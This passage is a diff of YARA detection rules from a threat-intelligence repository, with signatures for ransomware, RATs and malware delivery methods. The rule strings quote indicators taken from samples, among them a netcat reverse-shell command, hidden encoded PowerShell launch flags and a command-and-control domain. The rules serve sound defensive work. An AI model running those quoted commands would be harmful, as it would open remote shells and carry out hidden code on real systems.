-		id = "f7a9d2e6-bebf-598b-9e59-db0a3001b9f9"
-		date = "2022-09-02"
-		modified = "2022-02-19"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/PowerShell_Misc/download_variations.yar#L1-L14"
-		license_url = "N/A"
-		logic_hash = "7982438c032127349fb1c3477a23bab1c92eb68d9c3b26e2f5fb0a8c332dbc44"
-		score = 65
-		quality = 70
-		tags = "POWERSHELL, DOWNLOAD"
-
-	strings:
-		$location = "$Env:temp" nocase
-		$download = "downloadfile(" nocase
-		$rundll = "rundll32.exe"
-
-	condition:
-		$location and $download and $rundll
-}
-rule SECUINFRA_OBFUS_Javascript_Wscript_Hex_Strings_Usage
-{
-	meta:
-		description = "Detects the frequent usage of Wscript to get an hex encoded string from an array and interpret it. Used by e.g WSHRAT"
-		author = "SECUINFRA Falcon Team"
-		id = "dd55753e-4f7b-56be-a6d4-66f1d7dc8747"
-		date = "2022-12-02"
-		modified = "2022-02-13"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/javascript_obfuscation.yar#L2-L19"
-		license_url = "N/A"
-		logic_hash = "62bc3261b3c2e902a82423239a7ee0bcedfccbeeeda11833b935197144dc7c35"
-		score = 75
-		quality = 70
-		tags = ""
-
-	strings:
-		$wscript = "= WScript["
-		$hex_enc_str1 = "\\x63\\x72\\x65\\x61"
-		$hex_enc_str2 = "\\x73\\x63\\x72\\x69"
-		$hex_enc_str3 = "\\x71\\x75\\x69\\x74"
-		$hex_enc_str4 = "\\x41\\x72\\x67\\x75"
-
-	condition:
-		#wscript> 30 and 2 of ( $hex_enc_str* )
-}
-rule SECUINFRA_OBFUS_VBS_Reverse_Startup : FILE
-{
-	meta:
-		description = "Detecs reversed StartUp Path. Sometimes used as obfuscation"
-		author = "SECUINFRA Falcon Team"
-		id = "ecb96e30-0ac0-530a-83af-bb030f7dce4c"
-		date = "2022-02-27"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/vbs_obfuscation.yar#L2-L13"
-		license_url = "N/A"
-		logic_hash = "7b4d56d3bbe8d16d5e01fa9a021a368feb28b8b062860df76a2569966a97b8bc"
-		score = 75
-		quality = 70
-		tags = "FILE"
-
-	strings:
-		$reverse = "\\putratS\\smargorP\\uneM" wide nocase
-
-	condition:
-		filesize < 200KB and $reverse
-}
-rule SECUINFRA_OBFUS_Powershell_Execution : FILE
-{
-	meta:
-		description = "Detects some variations of obfuscated PowerShell code to execute further PowerShell code"
-		author = "SECUINFRA Falcon Team"
-		id = "b32c2a92-599c-5916-a335-dc996dcdc1bf"
-		date = "2022-09-02"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L1-L17"
-		license_url = "N/A"
-		logic_hash = "b201774edc4a20a0035cd68898a785a6c2fc03fb8739d515196e428d4a88af70"
-		score = 75
-		quality = 70
-		tags = "FILE"
-
-	strings:
-		$a1 = "-nop -w hiddEn -Ep bypass -Enc" ascii nocase
-		$a2 = "-noP -sta -w 1 -enc" ascii nocase
-		$b1 = "SQBFAF"
-
-	condition:
-		filesize < 300KB and $b1 and 1 of ( $a* )
-}
-rule SECUINFRA_OBFUS_Powershell_Replace_Tilde : FILE
+rule SECUINFRA_MALWARE_Formbook_Filename_Stage_2 : FILE
 {
 	meta:
-		description = "Detects usage of Replace to replace tilde. Often observed in obfuscation"
+		description = "No description has been set in the source file - SecuInfra"
 		author = "SECUINFRA Falcon Team"
-		id = "59b68982-01ae-588a-9802-bb92c72342a8"
-		date = "2022-10-02"
+		id = "74ae157c-30b3-5f07-83a3-6bc9e854fa84"
+		date = "2022-02-19"
 		modified = "2022-02-27"
-		reference = "https://bazaar.abuse.ch/sample/4c391b57d604c695925938bfc10ceb4673edd64e9655759c2aead9e12b3e17cf/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Obfuscation/powershell_obfuscation.yar#L19-L32"
+		reference = "https://bazaar.abuse.ch/sample/295a708fd87173762a4971443304e23990462f94e8db48d83472f19425daaa87"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/formbook.yar#L2-L14"
 		license_url = "N/A"
-		logic_hash = "a2693757f9aedc1019a94a15ae00f87af852d319aa698dadd7f9bb98128622a0"
+		logic_hash = "707fa457a99b47419b0b77716ed1f61cdb493f04cc26a156f903a30ef30ac428"
 		score = 75
 		quality = 70
 		tags = "FILE"
+		version = "0.1"
 
 	strings:
-		$a = ".Replace(\"~\",\"0\")"
+		$name = "PDF-Scan180220225499044" ascii wide
 
 	condition:
-		filesize < 400KB and $a
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and $name
 }
-rule SECUINFRA_APT_Bitter_Maldoc_Verify : CVE_2018_0798
+rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Python_Feb23
 {
 	meta:
-		description = "Detects Bitter (T-APT-17) shellcode in oleObject (CVE-2018-0798)"
+		description = "Detects the ESXiArgs Ransomware encryption bash script"
 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "8e0e32d3-f00e-5145-9386-f42ddca703ae"
-		date = "2022-06-01"
-		modified = "2022-07-05"
-		reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L11-L40"
+		id = "6e2d6695-b727-5b71-bfa0-e8290e057c36"
+		date = "2023-02-07"
+		modified = "2023-02-07"
+		reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Python_Feb23.yar#L1-L31"
 		license_url = "N/A"
-		logic_hash = "1d30e2ad0d99d274a4e3dd029ff41ec05e8ba4160bea37762bce1bb5286493d8"
+		logic_hash = "b821d1829ab4fb5eea896156a303198d6531d734196f0f947aef5d46754e6ccb"
 		score = 75
 		quality = 70
-		tags = "CVE-2018-0798"
-		tlp = "WHITE"
-		hash0 = "0c7158f9fc2093caf5ea1e34d8b8fffce0780ffd25191fac9c9b52c3208bc450"
-		hash1 = "bd0d25194634b2c74188cfa3be6668590e564e6fe26a6fe3335f95cbc943ce1d"
-		hash2 = "3992d5a725126952f61b27d43bd4e03afa5fa4a694dca7cf8bbf555448795cd6"
+		tags = ""
+		tlp = "CLEAR"
 
 	strings:
-		$xor_string0 = "LoadLibraryA" xor
-		$xor_string1 = "urlmon.dll" xor
-		$xor_string2 = "Shell32.dll" xor
-		$xor_string3 = "ShellExecuteA" xor
-		$xor_string4 = "MoveFileA" xor
-		$xor_string5 = "CreateDirectoryA" xor
-		$xor_string6 = "C:\\Windows\\explorer" xor
-		$padding = {000001128341000001128341000001128342000001128342}
+		$python = "#!/bin/python"
+		$desc = "This module starts debug tools"
+		$command0 = "server_namespace"
+		$command1 = "service_instance"
+		$command2 = "local"
+		$command3 = "operation_id"
+		$command4 = "envelope"
+		$cmd = "'mkfifo /tmp/tmpy_8th_nb; cat /tmp/tmpy_8th_nb | /bin/sh -i 2>&1 | nc %s %s > /tmp/tmpy_8th_nb' % (host, port)"
+		$OpenSLPPort = "port = '427'"
+		$listener = "HTTPServer(('127.0.0.1', 8008), PostServer).serve_forever()"
 
 	condition:
-		3 of ( $xor_string* ) and $padding
+		$python and $desc and 4 of ( $command* ) and $cmd and $OpenSLPPort and $listener
 }
-
-rule SECUINFRA_APT_Bitter_Almond_RAT : FILE
+rule SECUINFRA_MALWARE_Plugx_USB_Delivery_LNK_Jun23
 {
 	meta:
-		description = "Detects Bitter (T-APT-17) Almond RAT (.NET)"
+		description = "Detects PlugX-style Malware delivery via removable Drives (USB) - LNK File"
 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "191fadf9-4f64-56c9-bc2a-a7b4e27ab0fc"
-		date = "2022-06-01"
-		modified = "2022-07-05"
-		reference = " https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L82-L108"
+		id = "14c2e37e-91d7-5b66-916f-a1544a69a6fc"
+		date = "2023-06-21"
+		modified = "2023-06-21"
+		reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_PlugX_USB_Delivery_Jun21.yar#L1-L31"
 		license_url = "N/A"
-		hash = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396"
-		logic_hash = "b8d6b95987fe434fc16c87a7bc144f1fe69301a32bb93588df7c2abbfef62d75"
+		logic_hash = "afbbaf44e97b6db584780e0739bffd9c70e05e86284cb25b25a9d02cbeffff1f"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		tlp = "WHITE"
+		tags = ""
+		tlp = "CLEAR"
 
 	strings:
-		$function0 = "GetMacid" ascii
-		$function1 = "StartCommWithServer" ascii
-		$function2 = "sendingSysInfo" ascii
-		$dbg0 = "*|END|*" wide
-		$dbg1 = "FILE>" wide
-		$dbg2 = "[Command Executed Successfully]" wide
+		$lnk_magic = {4C 00 00 00 01 14 02 00}
+		$driveletter_4X = {4? 00 3A 00 5C 00 A0 00 5C}
+		$driveletter_5X = {5? 00 3A 00 5C 00 A0 00 5C}
+		$s_cmd = "C:\\Windows\\System32\\cmd.exe" ascii
+		$s_recBin = "\\RECYCLER.BIN\\" wide
+		$s_shell32 = "%SystemRoot%\\system32\\SHELL32.dll" wide
+		$s_comspec = "%ComSpec%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and dotnet.version == "v4.0.30319" and filesize > 12KB and filesize < 68KB and any of ( $function* ) and any of ( $dbg* )
+		$lnk_magic at 0x0 and any of ( $s_* ) and ( $driveletter_4X or $driveletter_5X )
 }
-rule SECUINFRA_APT_Bitter_PDB_Paths : FILE
+rule SECUINFRA_MALWARE_Plugx_USB_Delivery_Ini_Icon_Jun23
 {
 	meta:
-		description = "Detects Bitter (T-APT-17) PDB Paths"
+		description = "Detects PlugX-style Malware delivery via removable Drives (USB) - Desktop.ini Icon File; could potentially yield FPs"
 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "e2ad4ac3-45fe-5087-b0d6-a5de16774229"
-		date = "2022-06-22"
-		modified = "2022-07-05"
-		reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L110-L133"
-		license_url = "N/A"
-		logic_hash = "7eb9e4c1b4e0cca070596f3702045756eb32716481bb59f2f8322221804291f5"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		tlp = "WHITE"
-		hash0 = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396"
-
-	strings:
-		$pdbPath0 = "C:\\Users\\Window 10 C\\Desktop\\COMPLETED WORK\\" ascii
-		$pdbPath1 = "stdrcl\\stdrcl\\obj\\Release\\stdrcl.pdb"
-		$pdbPath2 = "g:\\Projects\\cn_stinker_34318\\"
-		$pdbPath3 = "renewedstink\\renewedstink\\obj\\Release\\stimulies.pdb"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and any of ( $pdbPath* )
-}
-rule SECUINFRA_MAL_Nw0Rm : FILE
-{
-	meta:
-		description = "Detect the final RAT dropped by N-W0rm"
-		author = "SECUINFRA Falcon Team"
-		id = "b014ce63-33ec-51df-a529-0c197dac2d7a"
-		date = "2022-03-02"
-		modified = "2022-02-07"
-		reference = "https://www.secuinfra.com/en/techtalk/n-w0rm-analysis-part-2/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/n-w0rm.yar#L1-L24"
+		id = "faaa507f-8478-5412-be86-4cae7fe28d21"
+		date = "2023-06-21"
+		modified = "2023-06-21"
+		reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_PlugX_USB_Delivery_Jun21.yar#L33-L49"
 		license_url = "N/A"
-		hash = "08587e04a2196aa97a0f939812229d2d"
-		logic_hash = "04078c57c1aa0065fceec7dc92b201bda23de1c5f5a940803a81250bdd685736"
+		logic_hash = "1cf552c4627073d13832cf0ac602a610e0919af9e9a197aa07fef5d6a414644b"
 		score = 75
 		quality = 70
-		tags = "FILE"
+		tags = ""
+		tlp = "CLEAR"
 
 	strings:
-		$a1 = "N-W0rm" fullword wide
-		$a2 = "N_W0rm" fullword wide
-		$a3 = "|NW|" fullword wide
-		$b1 = "Select * from AntivirusProduct" fullword wide
-		$b2 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File" fullword wide
-		$b3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
-		$b4 = "killer" fullword wide
-		$b5 = "nyanmoney02.duckdns.org" fullword wide
+		$s_shellclassinfo = "[.ShellClassInfo]" ascii
+		$s_IconRes = "IconResource=C:\\Windows\\system32\\SHELL32.dll,7" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $a* ) and 2 of ( $b* )
+		all of ( $s_* )
 }
-
-rule SECUINFRA_MAL_Njrat : FILE
+rule SECUINFRA_MALWARE_Plugx_USB_Delivery_Ini_Recbin_Jun23
 {
 	meta:
-		description = "No description has been set in the source file - SecuInfra"
-		author = "SECUINFRA Falcon Team"
-		id = "eeea8bcf-0d19-5c43-92cc-55c1110f46e5"
-		date = "2022-02-27"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/njrat.yar#L3-L35"
+		description = "Detects PlugX-style Malware delivery via removable Drives (USB) - Desktop.ini Recycle Bin; could potentially yield FPs"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "026eba63-12c1-55aa-b736-aea0494c1ab9"
+		date = "2023-06-21"
+		modified = "2023-06-21"
+		reference = "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_PlugX_USB_Delivery_Jun21.yar#L51-L70"
 		license_url = "N/A"
-		logic_hash = "e6f5ce20df70bc2f9d00931a84db08c1918a0639555204de8e86f3ba583a73f5"
+		logic_hash = "af5a1f20e46d9db3a9b50b5d8845e60f058c2885a560756266afbd8f3a01bf1e"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		hash_1 = "38928ae157586ec7785121f79ac5f9eb6727eae66aa512d8adf52d9485928126"
-		hash_2 = "fcfa50ca0d4dcf2bb6e96e7b7a223138068f2d6a458d2630757e3bcbe0684aaa"
-		hash_3 = "fa28ad86ab796c8e18096badc31bcb1719474d268945172d983bb30ded219944"
+		tags = ""
+		tlp = "CLEAR"
 
 	strings:
-		$mutex_1 = "02ddd2742fd5023579c925948979506c" wide
-		$mutex_2 = "f2defcfce1660e18fd445b5dbce27282" wide
-		$mutex_3 = "f7d3b79624476341312866012d0bbf19" wide
-		$a1 = "\"|'|'|\"" wide
-		$a2 = "SEE_MASK_NOZONECHECKS" wide
-		$b1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$b2 = "netsh firewall" wide
-		$b3 = "[ENTER]\\r\\n" wide
-		$b4 = "Execute ERROR" wide
+		$s_shellclassinfo = "[.ShellClassInfo]" ascii
+		$s_IconRes = "CLSID = {645FF040-5081-101B-9F08-00AA002F954E}" ascii
+		$neg_LRN = "shell32.dll,-8964" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imports ( "mscoree.dll" ) and pe.imports ( "avicap32.dll" ) and 1 of ( $mutex_* ) or ( 1 of ( $a* ) and 2 of ( $b* ) )
+		all of ( $s_* ) and not $neg_LRN
 }
-rule SECUINFRA_MAL_WSHRAT : RAT JAVASCRIPT WSHRAT FILE
+rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Encryptor_Feb23
 {
 	meta:
-		description = "Detects the final Payload of WSHART"
-		author = "SECUINFRA Falcon Team"
-		id = "8db5e349-c83e-53c3-a44d-cfe4732fe08d"
-		date = "2022-12-02"
-		modified = "2022-02-13"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/RAT/wshrat.yar#L2-L44"
+		description = "Detects the ESXiArgs Ransomware 'encrypt' binary"
+		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
+		id = "e91398bd-c8b5-5702-974e-017d2c0f6054"
+		date = "2023-02-07"
+		modified = "2023-02-07"
+		reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Encrypt_Feb23.yar#L1-L32"
 		license_url = "N/A"
-		hash = "b7f53ccc492400290016e802e946e526"
-		logic_hash = "12d893f0ca83e805fa570d3f72eb733c8d8b1ae6c0d37bf179ac675d108c7412"
+		logic_hash = "f0c9858275f547d4cf7d907377f079b817bf69cae9940b134e523bd7794d6f3b"
 		score = 75
-		quality = 68
-		tags = "RAT, JAVASCRIPT, WSHRAT, FILE"
-
-	strings:
-		$function1 = "runBinder"
-		$function2 = "getBinder"
-		$function3 = "Base64Encode"
-		$function4 = "payloadLuncher"
-		$function5 = "getMailRec"
-		$function6 = "getHbrowser"
-		$function7 = "passgrabber"
-		$function8 = "getRDP"
-		$function9 = "getUVNC"
-		$function10 = "getConfig"
-		$function11 = "getKeyLogger"
-		$function12 = "enumprocess"
-		$function13 = "cmdshell"
-		$function14 = "faceMask"
-		$function15 = "upload"
-		$function16 = "download"
-		$function17 = "sitedownloader"
-		$function18 = "servicestarter"
-		$function19 = "payloadLuncher"
-		$function20 = "keyloggerstarter"
-		$function21 = "reverserdp"
-		$function22 = "reverseproxy"
-		$function23 = "decode_pass"
-		$function24 = "disableSecurity"
-		$function25 = "installsdk"
-		$cmd1 = "osversion = eval(osversion)"
-		$cmd2 = "download(cmd[1],cmd[2])"
-		$cmd3 = "keyloggerstarter(cmd[1]"
-		$cmd4 = "decode_pass(retcmd);"
-
-	condition:
-		filesize < 2MB and 2 of ( $cmd* ) and 12 of ( $function* )
-}
-rule SECUINFRA_SUSP_Scheduled_Tasks_Create_From_Susp_Dir : FILE
-{
-	meta:
-		description = "Detects a PowerShell Script that creates a Scheduled Task that runs from an suspicious directory"
-		author = "SECUINFRA Falcon Team"
-		id = "65aad597-c5fe-50c3-8970-19fb502f1602"
-		date = "2022-02-21"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L2-L25"
-		license_url = "N/A"
-		logic_hash = "abe0592a8936898a43a1df9039829948f8a4a425c74cb970d2899d513c9cfffe"
-		score = 60
-		quality = 25
-		tags = "FILE"
-		version = "0.1"
-
-	strings:
-		$create = "New-ScheduledTaskAction"
-		$execute = "-Execute"
-		$trigger = "New-ScheduledTaskTrigger"
-		$at_param = "-At"
-		$register = "Register-ScheduledTask"
-		$action = "-Action"
-		$path1 = "C:\\ProgramData\\"
-		$path2 = "C:\\Windows\\Temp"
-		$path3 = "AppData\\Local"
-
-	condition:
-		filesize < 30KB and 1 of ( $path* ) and ( $create and $execute ) or ( $trigger and $at_param ) or ( $register and $action )
-}
-rule SECUINFRA_SUSP_Reverse_Run_Key : FILE
-{
-	meta:
-		description = "Detects a Reversed Run Key"
-		author = "SECUINFRA Falcon Team"
-		id = "230bed16-278e-574c-bb9b-cf6c44a7e9cd"
-		date = "2022-02-27"
-		modified = "2022-02-27"
-		reference = "https://github.com/SIFalcon/Detection"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L27-L38"
-		license_url = "N/A"
-		logic_hash = "dcb1a7e2c688287d08ade3d75e5c3d0dde6b645889bd4ec09ce8c131d8d3265e"
-		score = 65
 		quality = 70
-		tags = "FILE"
-
-	strings:
-		$run = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
-
-	condition:
-		filesize < 100KB and $run
-}
-rule SECUINFRA_RANSOM_Magniber_ISO_Jan23 : FILE
-{
-	meta:
-		description = "Detects Magniber Ransomware ISO files from fake Windows Update delivery method"
-		author = "SECUINFRA Falcon Team"
-		id = "6d5a937d-ac31-5c59-8e93-3fadc772d132"
-		date = "2023-01-13"
-		modified = "2023-01-13"
-		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_ISO_Jan23.yar#L1-L24"
-		license_url = "N/A"
-		hash = "4dcbcc070e7e3d0696c777b63e185406e3042de835b734fe7bb33cc12e539bf6"
-		logic_hash = "238baa794f4a87102534f7d6901819aa1b5dbb8156d56fb311e9fb1a6bc77f30"
-		score = 75
-		quality = 68
-		tags = "FILE"
+		tags = ""
 		tlp = "CLEAR"
 
 	strings:
-		$magic = {43 44 30 30 31}
-		$tool = {55 4C 54 52 41 49 53 4F 00 39 2E 37 2E 36 2E 33 38 32 39}
-		$msiMagic = {D0 CF 11 E0 A1 B1 1A E1}
-		$dosString = "!This program cannot be run in DOS mode" ascii
-		$lnkMagic = {4C 00 00 00}
+		$sosemanuk_prng = {48 8b 45 f8 48 01 45 e0 48 8b 45 f8 48 29 45 d8 48 8b 45 e8 8b 90 80 00 00 00 48 8b 45 f8 01 c2 48 8b 45 e8 89 90 80 00 00 00}
+		$sosemanuk_mul_a = {00 00 00 00 13 CF 9F E1 26 37 97 6B 35 F8 08 8A [992] DE 4D 5B B5 CD 82 C4 54 F8 7A CC DE EB B5 53 3F}
+		$sosemanuk_mul_ia = {00 00 00 00 CD 40 0F 18 33 80 1E 30 FE C0 11 28 [992] 1C 65 E2 9E D1 25 ED 86 2F E5 FC AE E2 A5 F3 B6}
+		$interpreter = "/lib64/ld-linux-x86-64.so.2"
+		$debug0 = "encrypt_bytes: too big data"
+		$debug1 = "Progress: %f"
+		$help = "usage: encrypt <public_key> <file_to_encrypt> [<enc_step>] [<enc_size>] [<file_size>]"
 
 	condition:
-		filesize > 200KB and filesize < 800KB and all of them
+		uint32be( 0x0 ) == 0x7F454C46 and all of ( $sosemanuk_* ) and $interpreter and 2 of ( $debug* ) and $help
 }
 
 rule SECUINFRA_RANSOM_Medusalocker_July22 : RANSOMWARE FILE
@@ -158159,38 +158467,30 @@ rule SECUINFRA_RANSOM_Medusalocker_July22 : RANSOMWARE FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "1a395bd10b20c116b11c2db5ee44c225" and filesize > 450KB and filesize < 1MB and all of ( $log* ) and $mutex and any of ( $uacbypass* ) and 2 of ( $note* ) and $ext and $services and 2 of ( $system* )
 }
-rule SECUINFRA_MALWARE_Emotet_Onenote_Delivery_Wsf_Mar23
+rule SECUINFRA_RANSOM_Magniber_LNK_Jan23
 {
 	meta:
-		description = "Detects Microsoft OneNote files used to deliver Emotet (.wsf Payload)"
-		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "a9201240-407d-5ca9-b7fd-37372a2e7d2a"
-		date = "2023-03-16"
-		modified = "2023-03-16"
-		reference = "https://www.secuinfra.com/en/news/the-whale-surfaces-again-emotet-epoch4-spam-botnet-returns/"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar#L1-L33"
+		description = "Detects Magniber Ransomware LNK files from fake Windows Update delivery method"
+		author = "SECUINFRA Falcon Team"
+		id = "2459a9e9-a6bb-50fc-9920-7632fdec7e91"
+		date = "2023-01-13"
+		modified = "2023-01-13"
+		reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_LNK_Jan23.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "ca48f5e694b18e3f0b89b0128817848a7d36f60d8a3ada522739849bf3f7126b"
+		hash = "16ecec4efa2174dec11f6a295779f905c8f593ab5cc96ae0f5249dc50469841c"
+		logic_hash = "074611d74e382bb19a45b052b5b2cc186bf3667420cb1625e9bda37f2e9774c5"
 		score = 75
-		quality = 45
+		quality = 70
 		tags = ""
 		tlp = "CLEAR"
-		hash0 = "dd9fcdcaf5c26fc27863c86aa65948924f23ab9faa261562cbc9d65ac80d33d4"
-		hash1 = "ca2234b9c6f7c453b91a1ca10fc7b05487f94850be7ac5ea42986347d93772d8"
-		hash2 = "b75681c1f99c4caf541478cc417ee9e8fba48f9b902c45d8bda0158a61ba1a2f"
-		hash3 = "7c4591fd03b73ba6d0ec71a3cf89a04bfb4bd240d359117d96834a83727bdcc2"
 
 	strings:
-		$s_protected = "This document is protected" wide
-		$s_click = "You have to double-click \"View\" button to open" wide
-		$s_imgFileName = "Untitled picture.jpg" wide
-		$script = "language=\"VBScript\""
-		$wsfExt = ".wsf" ascii wide
-		$GUIDwsf = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 3C 6A 6F 62 20 69 64 3D 22}
-		$endTmp = /rad.{5}\.tmp/
+		$netbiosName = "victim1" ascii fullword
+		$macAddress = {00 0C 29 07 E1 6D}
 
 	condition:
-		uint32be( 0x0 ) == 0xE4525C7B and any of ( $s_* ) and $script and $wsfExt and $GUIDwsf and $endTmp
+		uint32be( 0x0 ) == 0x4C000000 and all of them
 }
 
 rule SECUINFRA_RANSOM_Lockbit_Black_Packer : RANSOMWARE FILE
@@ -158223,34 +158523,38 @@ rule SECUINFRA_RANSOM_Lockbit_Black_Packer : RANSOMWARE FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize > 111KB and filesize < 270KB and all of ( $sectionname* ) and any of ( $check* ) and $asciiCalc and for any i in ( 0 .. pe.number_of_sections - 1 ) : ( math.entropy ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) > 7.9 and ( pe.sections [ i ] . name == ".text" or pe.sections [ i ] . name == ".data" or pe.sections [ i ] . name == ".pdata" ) and console.log ( "High Entropy section found:" , pe.sections [ i ] . name ) )
 }
-rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Encryptor_Feb23
+rule SECUINFRA_MALWARE_Emotet_Onenote_Delivery_Wsf_Mar23
 {
 	meta:
-		description = "Detects the ESXiArgs Ransomware 'encrypt' binary"
+		description = "Detects Microsoft OneNote files used to deliver Emotet (.wsf Payload)"
 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
-		id = "e91398bd-c8b5-5702-974e-017d2c0f6054"
-		date = "2023-02-07"
-		modified = "2023-02-07"
-		reference = "https://secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware"
-		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_ESXiArgs_Ransomware_Encrypt_Feb23.yar#L1-L32"
+		id = "a9201240-407d-5ca9-b7fd-37372a2e7d2a"
+		date = "2023-03-16"
+		modified = "2023-03-16"
+		reference = "https://www.secuinfra.com/en/news/the-whale-surfaces-again-emotet-epoch4-spam-botnet-returns/"
+		source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar#L1-L33"
 		license_url = "N/A"
-		logic_hash = "f0c9858275f547d4cf7d907377f079b817bf69cae9940b134e523bd7794d6f3b"
+		logic_hash = "ca48f5e694b18e3f0b89b0128817848a7d36f60d8a3ada522739849bf3f7126b"
 		score = 75
-		quality = 70
+		quality = 45
